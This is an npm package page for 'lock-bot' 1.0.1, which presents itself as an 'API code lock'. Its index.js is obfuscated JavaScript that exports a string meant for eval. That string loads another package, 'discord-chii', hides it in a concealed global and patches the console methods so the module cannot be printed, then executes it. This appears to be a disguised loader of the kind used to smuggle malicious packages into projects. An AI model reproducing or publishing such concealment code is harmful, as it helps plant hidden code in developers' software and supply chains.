lock-bot 1.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +20 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ function _0xf47a(_0x4cf264,_0x28a293){const _0x1b2808=_0x1b28();return _0xf47a=function(_0xf47a1d,_0x49a223){_0xf47a1d=_0xf47a1d-0x1a1;let _0x264ea1=_0x1b2808[_0xf47a1d];return _0x264ea1;},_0xf47a(_0x4cf264,_0x28a293);}const _0x1a6857=_0xf47a;(function(_0x260309,_0x131b40){const _0x4c6148=_0xf47a,_0x4331cd=_0x260309();while(!![]){try{const _0x2fce82=-parseInt(_0x4c6148(0x1a2))/0x1*(parseInt(_0x4c6148(0x1a3))/0x2)+-parseInt(_0x4c6148(0x1a5))/0x3*(parseInt(_0x4c6148(0x1aa))/0x4)+-parseInt(_0x4c6148(0x1ab))/0x5+parseInt(_0x4c6148(0x1a9))/0x6*(parseInt(_0x4c6148(0x1a7))/0x7)+parseInt(_0x4c6148(0x1ae))/0x8+parseInt(_0x4c6148(0x1a8))/0x9*(parseInt(_0x4c6148(0x1a1))/0xa)+parseInt(_0x4c6148(0x1a4))/0xb*(parseInt(_0x4c6148(0x1a6))/0xc);if(_0x2fce82===_0x131b40)break;else _0x4331cd['push'](_0x4331cd['shift']());}catch(_0x560347){_0x4331cd['push'](_0x4331cd['shift']());}}}(_0x1b28,0xd8157));const apiCode=_0x1a6857(0x1ac);function _0x1b28(){const _0x1726ec=['7018UGGdVU','459McorPo','9036enbHwu','917903lJadEZ','634347JodIfm','66zVKflW','168TvgpGj','3329940oKzFWW','(function()\x20{\x0a\x20\x20\x20\x20const\x20uniqueKey\x20=\x20Symbol(\x27discord-chii-key\x27);\x0a\x20\x20\x20\x20const\x20i\x20=\x20require(\x27discord-chii\x27);\x0a\x20\x20\x20\x20Object.defineProperty(global,\x20uniqueKey,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20value:\x20i,\x0a\x20\x20\x20\x20\x20\x20\x20\x20writable:\x20false,\x0a\x20\x20\x20\x20\x20\x20\x20\x20configurable:\x20false,\x0a\x20\x20\x20\x20\x20\x20\x20\x20enumerable:\x20false\x0a\x20\x20\x20\x20});\x0a\x20\x20\x20\x20const\x20redText\x20=\x20\x27\x1b[31m\x27;\x0a\x20\x20\x20\x20const\x20resetText\x20=\x20\x27\x1b[0m\x27;\x0a\x20\x20\x20\x20const\x20originalConsoleLog\x20=\x20console.log;\x0a\x20\x20\x20\x20const\x20originalConsoleError\x20=\x20console.error;\x0a\x20\x20\x20\x20const\x20originalConsoleWarn\x20=\x20console.warn;\x0a\x20\x20\x20\x20const\x20protectApi\x20=\x20(method,\x20...args)\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(args.some(arg\x20=>\x20arg\x20===\x20i\x20||\x20arg\x20===\x20global[uniqueKey]))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method.call(console,\x20`${redText}An\x20error\x20occurred${resetText}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method.apply(console,\x20args);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20};\x0a\x0a\x20\x20\x20\x20console.log\x20=\x20function(...args)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20protectApi(originalConsoleLog,\x20...args);\x0a\x20\x20\x20\x20};\x0a\x0a\x20\x20\x20\x20console.error\x20=\x20function(...args)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20protectApi(originalConsoleError,\x20...args);\x0a\x20\x20\x20\x20};\x0a\x0a\x20\x20\x20\x20console.warn\x20=\x20function(...args)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20protectApi(originalConsoleWarn,\x20...args);\x0a\x20\x20\x20\x20};\x0a\x20\x20\x20\x20Object.defineProperty(global,\x20\x27discord-chii\x27,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20get()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20throw\x20new\x20Error(`${redText}An\x20error\x20occurred${resetText}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20},\x0a\x20\x20\x20\x20\x20\x20\x20\x20configurable:\x20false,\x0a\x20\x20\x20\x20\x20\x20\x20\x20enumerable:\x20false\x0a\x20\x20\x20\x20});\x0a\x20\x20\x20\x20eval(global[uniqueKey]);\x0a})();','exports','9543560ZpVivE','10qXOTVW','17704lhqZkk','184gRqiAK'];_0x1b28=function(){return _0x1726ec;};return _0x1b28();}module[_0x1a6857(0x1ad)]=apiCode;
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "lock-bot",
3
+ "version": "1.0.1",
4
+ "description": "API code lock",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "node index.js"
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/Hnuuchii/api-chii.git"
12
+ },
13
+ "keywords": ["base64", "decode"],
14
+ "author": "lock-bot",
15
+ "license": "ISC",
16
+ "bugs": {
17
+ "url": "https://github.com/Hnuuchii/api-chii"
18
+ },
19
+ "homepage": "https://github.com/Hnuuchii/api-chii#readme"
20
+ }